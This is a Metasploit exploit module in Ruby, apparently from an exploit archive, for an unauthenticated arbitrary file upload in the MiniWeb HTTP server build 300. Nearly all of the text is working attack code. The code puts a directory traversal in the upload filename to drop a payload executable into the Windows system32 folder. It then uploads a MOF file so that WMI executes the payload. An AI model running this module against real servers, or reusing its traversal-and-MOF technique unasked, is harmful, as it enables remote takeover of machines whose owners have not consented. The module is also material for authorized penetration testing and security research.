MiniWeb (Build 300) Arbitrary File Upload (metasploit)

1. MiniWeb (Build 300) Arbitrary File Upload
2. (metasploit)
3.  
4. ##
5. # This file is part of the Metasploit Framework and may be subject to
6. # redistribution and commercial restrictions. Please see the Metasploit
7. # Framework web site for more information on licensing and terms of use.
8. # http://metasploit.com/framework/
9. ##
10.  
11. require 'msf/core'
12.  
13. class Metasploit3 < Msf::Exploit::Remote
14. Rank = ExcellentRanking
15.  
16. HttpFingerprint = { :pattern => [ /MiniWeb/ ] }
17.  
18. include Msf::Exploit::Remote::HttpClient
19. include Msf::Exploit::EXE
20. include Msf::Exploit::WbemExec
21. include Msf::Exploit::FileDropper
22.  
23. def initialize(info={})
24. super(update_info(info,
25. 'Name' => "MiniWeb (Build 300) Arbitrary File Upload",
26. 'Description' => %q{
27. This module exploits a vulnerability in MiniWeb HTTP server (build 300).
28. The software contains a file upload vulnerability that allows an
29. unauthenticated remote attacker to write arbitrary files to the file system.
30.  
31. Code execution can be achieved by first uploading the payload to the remote
32. machine as an exe file, and then upload another mof file, which enables
33. WMI (Management Instrumentation service) to execute the uploaded payload.
34. Please note that this module currently only works for Windows before Vista.
35. },
36. 'License' => MSF_LICENSE,
37. 'Author' =>
38. [
39. 'AkaStep', # Initial discovery
40. 'Brendan Coles <bcoles[at]gmail.com>', # Metasploit
41. ],
42. 'References' =>
43. [
44. ['OSVDB', '92198'],
45. ['OSVDB', '92200'],
46. ['URL', 'http://dl.packetstormsecurity.net/1304-exploits/miniweb-shelltraversal.txt']
47. ],
48. 'Payload' =>
49. {
50. 'BadChars' => "\x00",
51. },
52. 'Platform' => 'win',
53. 'Targets' =>
54. [
55. # Tested on MiniWeb build 300, built on Feb 28 2013
56. # - Windows XP SP3 (EN)
57. ['MiniWeb build 300 on Windows (Before Vista)', {}]
58. ],
59. 'Privileged' => true,
60. 'DisclosureDate' => "Apr 9 2013",
61. 'DefaultTarget' => 0))
62.  
63. register_options([
64. Opt::RPORT(8000),
65. OptInt.new('DEPTH', [true, 'Traversal depth', 10])
66. ], self.class)
67.  
68. end
69.  
70. def peer
71. "#{rhost}:#{rport}"
72. end
73.  
74. def check
75.  
76. begin
77. uri = normalize_uri(target_uri.path.to_s, "#{rand_text_alpha(rand(10)+5)}")
78. res = send_request_cgi({
79. 'method' => 'GET',
80. 'uri' => uri
81. })
82. rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
83. fail_with(Exploit::Failure::Unreachable, "#{peer} - Connection failed")
84. end
85.  
86. if !res or res.headers['Server'].empty?
87. return Exploit::CheckCode::Unknown
88. elsif res.headers['Server'] =~ /^MiniWeb$/
89. return Exploit::CheckCode::Detected
90. end
91.  
92. return Exploit::CheckCode::Unknown
93.  
94. end
95.  
96. def upload(filename, filedata)
97.  
98. print_status("#{peer} - Trying to upload '#{::File.basename(filename)}'")
99. uri = normalize_uri(target_uri.path.to_s, "#{rand_text_alpha(rand(10)+5)}")
100. depth = "../" * (datastore['DEPTH'] + rand(10))
101.  
102. boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(10)}"
103. post_data = "--#{boundary}\r\n"
104. post_data << "Content-Disposition: form-data; name=\"file\"; filename=\"#{depth}#{filename}\"\r\n"
105. post_data << "Content-Type: application/octet-stream\r\n"
106. post_data << "\r\n#{filedata}\r\n"
107. post_data << "--#{boundary}\r\n"
108.  
109. begin
110. res = send_request_cgi({
111. 'method' => 'POST',
112. 'uri' => uri,
113. 'ctype' => "multipart/form-data; boundary=#{boundary}",
114. 'data' => post_data
115. })
116. rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
117. fail_with(Exploit::Failure::Unreachable, "#{peer} - Connection failed")
118. end
119.  
120. return res
121.  
122. end
123.  
124. def exploit
125. fname = "#{rand_text_alpha(rand(10)+5)}"
126.  
127. # upload exe
128. exe_name = "WINDOWS/system32/#{fname}.exe"
129. exe = generate_payload_exe
130. print_status("#{peer} - Sending executable (#{exe.length.to_s} bytes)")
131. upload(exe_name, exe)
132.  
133. # upload mof
134. mof_name = "WINDOWS/system32/wbem/mof/#{fname}.mof"
135. mof = generate_mof(::File.basename(mof_name), ::File.basename(exe_name))
136. print_status("#{peer} - Sending MOF (#{mof.length.to_s} bytes)")
137. upload(mof_name, mof)
138.  
139. # list files to clean up
140. register_file_for_cleanup("#{::File.basename(exe_name)}")
141. register_file_for_cleanup("wbem\\mof\\good\\#{::File.basename(mof_name)}")
142. end
143.  
144. end